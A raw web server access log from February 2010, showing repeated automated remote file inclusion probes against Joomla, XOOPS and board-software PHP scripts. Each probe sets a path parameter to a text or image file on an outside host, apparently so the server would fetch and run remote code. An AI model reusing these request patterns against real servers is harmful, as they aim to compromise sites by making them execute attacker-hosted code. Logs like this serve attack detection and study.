62.140.23.24 - - [15/Feb/2010:03:34:59 -0500] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:35:27 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:35:27 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:35:27 -0500] "GET /logs/access_log.Q110012500//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:35:27 -0500] "GET /logs/access_log.Q110012700//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:35:44 -0500] "GET /logs/error_log.Q109061600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 254 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:35:50 -0500] "GET /logs/error_log.Q109061600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 254 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:03:35:55 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3171A95722829100752D03J+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.121.105.125 - - [15/Feb/2010:03:36:27 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:27 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:27 -0500] "GET /logs/access_log.Q109073100%20%20//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:27 -0500] "GET /logs/access_log.Q109081500%20%20//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:36 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:36 -0500] "GET /logs/access_log.Q109073100%20%20//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:36 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:36:40 -0500] "GET /logs/error_log.Q109051700%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:03:36:44 -0500] "GET /logs/access_log.Q109081500%20%20//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:37:00 -0500] "GET //pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:37:00 -0500] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:37:00 -0500] "GET /logs/access_log.Q109102200//pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:37:03 -0500] "GET //pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:37:03 -0500] "GET /logs/access_log.Q109102200//pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:37:03 -0500] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:03:37:35 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:03:37:44 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:38:10 -0500] "GET /logs//include/prodler.class.php?sPath=http://www.monma.co.kr/images/x1.gif??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:38:10 -0500] "GET //include/prodler.class.php?sPath=http://www.monma.co.kr/images/x1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:38:10 -0500] "GET /logs/access_log.Q109122000//include/prodler.class.php?sPath=http://www.monma.co.kr/images/x1.gif??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:38:13 -0500] "GET /logs/access_log.Q109081500//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:38:13 -0500] "GET /logs/access_log.Q109073100//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:38:23 -0500] "GET /logs/access_log.Q110011600/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:03:38:23 -0500] "GET //modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:03:38:30 -0500] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:03:38:30 -0500] "GET /logs/access_log.Q109050800%20%20//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:38:47 -0500] "GET /logs/access_log.Q109073100//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:38:47 -0500] "GET /logs/access_log.Q109081500//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:03:39:02 -0500] "GET //include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:03:39:02 -0500] "GET /logs//include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:03:39:02 -0500] "GET /logs/access_log.Q109122700//include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:03:39:10 -0500] "GET /logs/access_log.Q110011800%20%20//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:11 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:11 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:11 -0500] "GET /logs/access_log.Q110013100%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:26 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:26 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:26 -0500] "GET /logs/access_log.Q110013100%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.119.103.16 - - [15/Feb/2010:03:39:27 -0500] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:39:43 -0500] "GET /////components/com_rwcards/config_rwcards.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:39:43 -0500] "GET /logs/////components/com_rwcards/config_rwcards.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:39:43 -0500] "GET /logs/access_log.Q109071600%20%20/////components/com_rwcards/config_rwcards.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:39:43 -0500] "GET /logs/access_log.Q109071600%20%20/////components/com_rwcards/config_rwcards.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:39:43 -0500] "GET /logs/////components/com_rwcards/config_rwcards.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:39:43 -0500] "GET /////components/com_rwcards/config_rwcards.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.54.22.2 - - [15/Feb/2010:03:39:47 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 249 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:03:39:47 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 254 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
125.141.91.138 - - [15/Feb/2010:03:39:50 -0500] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:50 -0500] "GET ///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:39:51 -0500] "GET /logs/access_log.Q110010400///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:39:55 -0500] "GET /logs/error_log.Q109122000//include/prodler.class.php?sPath=http://www.monma.co.kr/images/x1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:40:03 -0500] "GET //modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:40:08 -0500] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:40:08 -0500] "GET /logs/access_log.Q109050800%20%20//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:03:40:10 -0500] "GET //include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:03:40:10 -0500] "GET /logs//include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:03:40:10 -0500] "GET /logs/access_log.Q109122700//include/setup.php?dir=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:40:13 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:40:13 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:40:13 -0500] "GET /logs/access_log.Q109112400//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:40:20 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.197.10 - - [15/Feb/2010:03:40:28 -0500] "GET /logs/access_log.Q109121100/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.197.10 - - [15/Feb/2010:03:40:28 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 38410 "-" "Mozilla/5.0"
222.122.197.10 - - [15/Feb/2010:03:40:28 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:40:30 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:40:30 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:40:30 -0500] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:40:32 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.197.10 - - [15/Feb/2010:03:40:35 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
222.122.197.10 - - [15/Feb/2010:03:40:35 -0500] "GET /logs/access_log.Q109121100/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.197.10 - - [15/Feb/2010:03:40:35 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 38410 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:40:39 -0500] "GET /logs/access_log.Q109071600/delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:40:39 -0500] "GET /logs/delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:40:39 -0500] "GET /delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:40:43 -0500] "GET /logs/access_log.Q110020700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:40:43 -0500] "GET /logs/access_log.Q109072200%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:40:47 -0500] "GET /logs/error_log.Q109070900/delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:40:48 -0500] "GET /logs/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 221 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:40:49 -0500] "GET /delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 216 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:40:49 -0500] "GET /logs/access_log.Q110020200%20%20/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:03:40:54 -0500] "GET /logs/access_log.Q109050800//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:00 -0500] "GET //write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:00 -0500] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:00 -0500] "GET /logs/access_log.Q110012500//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:03 -0500] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:03 -0500] "GET /logs/access_log.Q110012500//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:03 -0500] "GET //write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:08 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:08 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:08 -0500] "GET /logs/access_log.Q110013100//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:41:19 -0500] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:41:19 -0500] "GET //write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:41:19 -0500] "GET /logs/access_log.Q110020800%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:24 -0500] "GET /logs/access_log.Q109091100//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:41:27 -0500] "GET /logs/access_log.Q109122000%20%20//include/prodler.class.php?sPath=http://www.monma.co.kr/images/x1.gif??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:41:29 -0500] "GET /logs/access_log.Q109091100//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:37 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:37 -0500] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:37 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:37 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:37 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:37 -0500] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:03:41:38 -0500] "GET /logs/access_log.Q110011800%20%20//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:41:39 -0500] "GET /logs/access_log.Q109071600/delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:41:39 -0500] "GET /delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:41:39 -0500] "GET /logs/delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:42 -0500] "GET /logs/access_log.Q109072200%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:42 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:42 -0500] "GET /logs/access_log.Q110013100//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:41:42 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:41:42 -0500] "GET /logs/error_log.Q109122000%20%20//include/prodler.class.php?sPath=http://www.monma.co.kr/images/x1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:03:41:46 -0500] "GET /logs/access_log.Q109072200%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:41:47 -0500] "GET /logs/error_log.Q109070900/delete_all.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
